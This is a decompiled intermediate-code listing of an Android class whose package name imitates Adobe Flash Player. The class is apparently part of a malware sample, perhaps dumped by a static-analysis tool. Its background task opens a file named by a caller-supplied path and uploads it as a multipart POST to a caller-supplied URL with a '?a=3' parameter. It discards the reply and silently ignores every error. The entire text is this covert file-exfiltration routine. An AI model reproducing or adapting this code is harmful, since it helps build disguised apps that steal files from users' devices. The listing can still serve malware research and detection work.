record `com.adobe.flashplayer_.FlashVirtual` @kind class @AccessFlag PUBLIC extends `android.os.AsyncTask` @kind class {
}
procedure `void` `<init>`(`com.adobe.flashplayer_.FlashVirtual` v0 @kind this) @signature `Lcom/adobe/flashplayer_/FlashVirtual;.<init>:()V` @AccessFlag PUBLIC_CONSTRUCTOR {
    temp;

  #L035ce4.  call `<init>`(v0) @signature `Landroid/os/AsyncTask;.<init>:()V` @kind direct;
  #L035cea.  return @kind void;
}
procedure `java.lang.Object` `doInBackground`(`com.adobe.flashplayer_.FlashVirtual` v1 @kind this, `java.lang.Object`[] v2 @kind object) @signature `Lcom/adobe/flashplayer_/FlashVirtual;.doInBackground:([Ljava/lang/Object;)Ljava/lang/Object;` @AccessFlag PROTECTED_SYNTHETIC {
    temp;
    v0;

  #L035cfc.  v2:= (`java.lang.String`[]) v2 @kind object;
  #L035d00.  call temp:= `doInBackground`(v1, v2) @signature `Lcom/adobe/flashplayer_/FlashVirtual;.doInBackground:([Ljava/lang/String;)Ljava/lang/String;` @kind virtual;
  #L035d06.  v0:= temp @kind object;
  #L035d08.  return v0 @kind object;
}
procedure `java.lang.String` `doInBackground`(`com.adobe.flashplayer_.FlashVirtual` v23 @kind this, `java.lang.String`[] v24 @kind object @name `params`) @signature `Lcom/adobe/flashplayer_/FlashVirtual;.doInBackground:([Ljava/lang/String;)Ljava/lang/String;` @AccessFlag PROTECTED {
    temp;
    v0;
    v1;
    v2;
    v3;
    v4;
    v5;
    v6;
    v7;
    v8;
    v9;
    v10;
    v11;
    v12;
    v13;
    v14;
    v15;
    v16;
    v17;
    v18;
    v19;
    v20;
    v21;
    v22;

  #L035d1c.  v7:= 0I;
  #L035d1e.  v8:= 0I;
  #L035d20.  v12:= 0I;
  #L035d22.  v20:= 1I;
  #L035d26.  v10:= v24[v20] @kind object;
  #L035d2a.  v14:= "\r\n" @kind object;
  #L035d2e.  v17:= "--" @kind object;
  #L035d32.  v2:= "*****" @kind object;
  #L035d36.  v15:= 1048576I;
  #L035d3a.  v20:= new `java.lang.StringBuilder`;
  #L035d3e.  v21:= 2I;
  #L035d42.  v21:= v24[v21] @kind object;
  #L035d46.  call temp:= `valueOf`(v21) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L035d4c.  v21:= temp @kind object;
  #L035d4e.  call `<init>`(v20, v21) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L035d54.  v21:= "?a=3" @kind object;
  #L035d58.  call temp:= `append`(v20, v21) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L035d5e.  v20:= temp @kind object;
  #L035d60.  v21:= 0I;
  #L035d64.  v21:= v24[v21] @kind object;
  #L035d68.  call temp:= `append`(v20, v21) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L035d6e.  v20:= temp @kind object;
  #L035d70.  call temp:= `toString`(v20) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L035d76.  v19:= temp @kind object;
  #Try_start0.  
  #L035d78.  v11:= new `java.io.FileInputStream`;
  #L035d7c.  v20:= new `java.io.File`;
  #L035d80.  v0:= v20 @kind object;
  #L035d84.  call `<init>`(v0, v10) @signature `Ljava/io/File;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L035d8a.  v0:= v20 @kind object;
  #L035d8e.  call `<init>`(v11, v0) @signature `Ljava/io/FileInputStream;.<init>:(Ljava/io/File;)V` @kind direct;
  #L035d94.  v18:= new `java.net.URL`;
  #L035d98.  call `<init>`(v18, v19) @signature `Ljava/net/URL;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L035d9e.  call temp:= `openConnection`(v18) @signature `Ljava/net/URL;.openConnection:()Ljava/net/URLConnection;` @kind virtual;
  #L035da4.  v20:= temp @kind object;
  #L035da6.  v0:= v20 @kind object;
  #L035daa.  v0:= (`java.net.HttpURLConnection`) v0 @kind object;
  #L035dae.  v7:= v0 @kind object;
  #L035db0.  v20:= 1I;
  #L035db4.  v0:= v20;
  #L035db8.  call `setDoInput`(v7, v0) @signature `Ljava/net/HttpURLConnection;.setDoInput:(Z)V` @kind virtual;
  #L035dbe.  v20:= 1I;
  #L035dc2.  v0:= v20;
  #L035dc6.  call `setDoOutput`(v7, v0) @signature `Ljava/net/HttpURLConnection;.setDoOutput:(Z)V` @kind virtual;
  #L035dcc.  v20:= 0I;
  #L035dd0.  v0:= v20;
  #L035dd4.  call `setUseCaches`(v7, v0) @signature `Ljava/net/HttpURLConnection;.setUseCaches:(Z)V` @kind virtual;
  #L035dda.  v20:= "POST" @kind object;
  #L035dde.  v0:= v20 @kind object;
  #L035de2.  call `setRequestMethod`(v7, v0) @signature `Ljava/net/HttpURLConnection;.setRequestMethod:(Ljava/lang/String;)V` @kind virtual;
  #L035de8.  v20:= "Connection" @kind object;
  #L035dec.  v21:= "Keep-Alive" @kind object;
  #L035df0.  v0:= v20 @kind object;
  #L035df4.  v1:= v21 @kind object;
  #L035df8.  call `setRequestProperty`(v7, v0, v1) @signature `Ljava/net/HttpURLConnection;.setRequestProperty:(Ljava/lang/String;Ljava/lang/String;)V` @kind virtual;
  #L035dfe.  v20:= "Content-Type" @kind object;
  #L035e02.  v21:= new `java.lang.StringBuilder`;
  #L035e06.  v22:= "multipart/form-data;boundary=" @kind object;
  #L035e0a.  call `<init>`(v21, v22) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L035e10.  v0:= v21 @kind object;
  #L035e14.  call temp:= `append`(v0, v2) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L035e1a.  v21:= temp @kind object;
  #L035e1c.  call temp:= `toString`(v21) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L035e22.  v21:= temp @kind object;
  #L035e24.  v0:= v20 @kind object;
  #L035e28.  v1:= v21 @kind object;
  #L035e2c.  call `setRequestProperty`(v7, v0, v1) @signature `Ljava/net/HttpURLConnection;.setRequestProperty:(Ljava/lang/String;Ljava/lang/String;)V` @kind virtual;
  #L035e32.  v9:= new `java.io.DataOutputStream`;
  #L035e36.  call temp:= `getOutputStream`(v7) @signature `Ljava/net/HttpURLConnection;.getOutputStream:()Ljava/io/OutputStream;` @kind virtual;
  #L035e3c.  v20:= temp @kind object;
  #L035e3e.  v0:= v20 @kind object;
  #L035e42.  call `<init>`(v9, v0) @signature `Ljava/io/DataOutputStream;.<init>:(Ljava/io/OutputStream;)V` @kind direct;
  #Try_end0.  
  #Try_start1.  
  #L035e48.  v20:= new `java.lang.StringBuilder`;
  #L035e4c.  call temp:= `valueOf`(v17) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L035e52.  v21:= temp @kind object;
  #L035e54.  call `<init>`(v20, v21) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L035e5a.  v0:= v20 @kind object;
  #L035e5e.  call temp:= `append`(v0, v2) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L035e64.  v20:= temp @kind object;
  #L035e66.  v0:= v20 @kind object;
  #L035e6a.  call temp:= `append`(v0, v14) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L035e70.  v20:= temp @kind object;
  #L035e72.  call temp:= `toString`(v20) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L035e78.  v20:= temp @kind object;
  #L035e7a.  v0:= v20 @kind object;
  #L035e7e.  call `writeBytes`(v9, v0) @signature `Ljava/io/DataOutputStream;.writeBytes:(Ljava/lang/String;)V` @kind virtual;
  #L035e84.  v20:= new `java.lang.StringBuilder`;
  #L035e88.  v21:= "Content-Disposition: form-data; name='TEMP'; filename='" @kind object;
  #L035e8c.  call `<init>`(v20, v21) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L035e92.  v0:= v20 @kind object;
  #L035e96.  call temp:= `append`(v0, v10) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L035e9c.  v20:= temp @kind object;
  #L035e9e.  v21:= "'" @kind object;
  #L035ea2.  call temp:= `append`(v20, v21) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L035ea8.  v20:= temp @kind object;
  #L035eaa.  v0:= v20 @kind object;
  #L035eae.  call temp:= `append`(v0, v14) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L035eb4.  v20:= temp @kind object;
  #L035eb6.  call temp:= `toString`(v20) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L035ebc.  v20:= temp @kind object;
  #L035ebe.  v0:= v20 @kind object;
  #L035ec2.  call `writeBytes`(v9, v0) @signature `Ljava/io/DataOutputStream;.writeBytes:(Ljava/lang/String;)V` @kind virtual;
  #L035ec8.  call `writeBytes`(v9, v14) @signature `Ljava/io/DataOutputStream;.writeBytes:(Ljava/lang/String;)V` @kind virtual;
  #L035ece.  call temp:= `available`(v11) @signature `Ljava/io/FileInputStream;.available:()I` @kind virtual;
  #L035ed4.  v5:= temp;
  #L035ed6.  call temp:= `min`(v5, v15) @signature `Ljava/lang/Math;.min:(II)I` @kind static;
  #L035edc.  v4:= temp;
  #L035ede.  v3:= new `byte`[v4];
  #L035ee2.  v20:= 0I;
  #L035ee6.  v0:= v20;
  #L035eea.  call temp:= `read`(v11, v3, v0, v4) @signature `Ljava/io/FileInputStream;.read:([BII)I` @kind virtual;
  #L035ef0.  v6:= temp;
  #L035ef2.  if v6 > 0 then goto L035f8c;
  #L035ef6.  call `writeBytes`(v9, v14) @signature `Ljava/io/DataOutputStream;.writeBytes:(Ljava/lang/String;)V` @kind virtual;
  #L035efc.  v20:= new `java.lang.StringBuilder`;
  #L035f00.  call temp:= `valueOf`(v17) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L035f06.  v21:= temp @kind object;
  #L035f08.  call `<init>`(v20, v21) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L035f0e.  v0:= v20 @kind object;
  #L035f12.  call temp:= `append`(v0, v2) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L035f18.  v20:= temp @kind object;
  #L035f1a.  v0:= v20 @kind object;
  #L035f1e.  v1:= v17 @kind object;
  #L035f22.  call temp:= `append`(v0, v1) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L035f28.  v20:= temp @kind object;
  #L035f2a.  v0:= v20 @kind object;
  #L035f2e.  call temp:= `append`(v0, v14) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L035f34.  v20:= temp @kind object;
  #L035f36.  call temp:= `toString`(v20) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L035f3c.  v20:= temp @kind object;
  #L035f3e.  v0:= v20 @kind object;
  #L035f42.  call `writeBytes`(v9, v0) @signature `Ljava/io/DataOutputStream;.writeBytes:(Ljava/lang/String;)V` @kind virtual;
  #L035f48.  call `close`(v11) @signature `Ljava/io/FileInputStream;.close:()V` @kind virtual;
  #L035f4e.  call `flush`(v9) @signature `Ljava/io/DataOutputStream;.flush:()V` @kind virtual;
  #L035f54.  call `close`(v9) @signature `Ljava/io/DataOutputStream;.close:()V` @kind virtual;
  #Try_end1.  
  #L035f5a.  v8:= v9 @kind object;
  #Try_start2.  
  #L035f5c.  v13:= new `java.io.DataInputStream`;
  #L035f60.  call temp:= `getInputStream`(v7) @signature `Ljava/net/HttpURLConnection;.getInputStream:()Ljava/io/InputStream;` @kind virtual;
  #L035f66.  v20:= temp @kind object;
  #L035f68.  v0:= v20 @kind object;
  #L035f6c.  call `<init>`(v13, v0) @signature `Ljava/io/DataInputStream;.<init>:(Ljava/io/InputStream;)V` @kind direct;
  #Try_end2.  
  #Try_start3.  
  #L035f72.  call temp:= `readLine`(v13) @signature `Ljava/io/DataInputStream;.readLine:()Ljava/lang/String;` @kind virtual;
  #L035f78.  v16:= temp @kind object;
  #L035f7a.  if v16 != 0 then goto L035f72;
  #L035f7e.  call `close`(v13) @signature `Ljava/io/DataInputStream;.close:()V` @kind virtual;
  #Try_end3.  
  #L035f84.  v12:= v13 @kind object;
  #L035f86.  v20:= 0I;
  #L035f8a.  return v20 @kind object;
  #L035f8c.  v20:= 0I;
  #Try_start4.  
  #L035f90.  v0:= v20;
  #L035f94.  call `write`(v9, v3, v0, v4) @signature `Ljava/io/DataOutputStream;.write:([BII)V` @kind virtual;
  #L035f9a.  call temp:= `available`(v11) @signature `Ljava/io/FileInputStream;.available:()I` @kind virtual;
  #L035fa0.  v5:= temp;
  #L035fa2.  call temp:= `min`(v5, v15) @signature `Ljava/lang/Math;.min:(II)I` @kind static;
  #L035fa8.  v4:= temp;
  #L035faa.  v20:= 0I;
  #L035fae.  v0:= v20;
  #L035fb2.  call temp:= `read`(v11, v3, v0, v4) @signature `Ljava/io/FileInputStream;.read:([BII)I` @kind virtual;
  #Try_end4.  
  #L035fb8.  v6:= temp;
  #L035fba.  goto L035ef2;
  #L035fbc.  v20:= Exception @type ^`java.io.IOException` @kind object;
  #L035fbe.  goto L035f86;
  #L035fc0.  v20:= Exception @type ^`java.io.IOException` @kind object;
  #L035fc2.  v12:= v13 @kind object;
  #L035fc4.  goto L035f86;
  #L035fc6.  v20:= Exception @type ^`java.io.IOException` @kind object;
  #L035fc8.  goto L035f5c;
  #L035fca.  v20:= Exception @type ^`java.io.IOException` @kind object;
  #L035fcc.  v8:= v9 @kind object;
  #L035fce.  goto L035f5c;
  #L035fd0.  v20:= Exception @type ^`java.net.MalformedURLException` @kind object;
  #L035fd2.  goto L035f5c;
  #L035fd4.  v20:= Exception @type ^`java.net.MalformedURLException` @kind object;
  #L035fd6.  v8:= v9 @kind object;
  #L035fd8.  goto L035f5c;
  catch `java.net.MalformedURLException` @[Try_start0..Try_end0] goto L035fd0;
  catch `java.io.IOException` @[Try_start0..Try_end0] goto L035fc6;
  catch `java.net.MalformedURLException` @[Try_start1..Try_end1] goto L035fd4;
  catch `java.io.IOException` @[Try_start1..Try_end1] goto L035fca;
  catch `java.io.IOException` @[Try_start2..Try_end2] goto L035fbc;
  catch `java.io.IOException` @[Try_start3..Try_end3] goto L035fc0;
  catch `java.net.MalformedURLException` @[Try_start4..Try_end4] goto L035fd4;
  catch `java.io.IOException` @[Try_start4..Try_end4] goto L035fca;
}
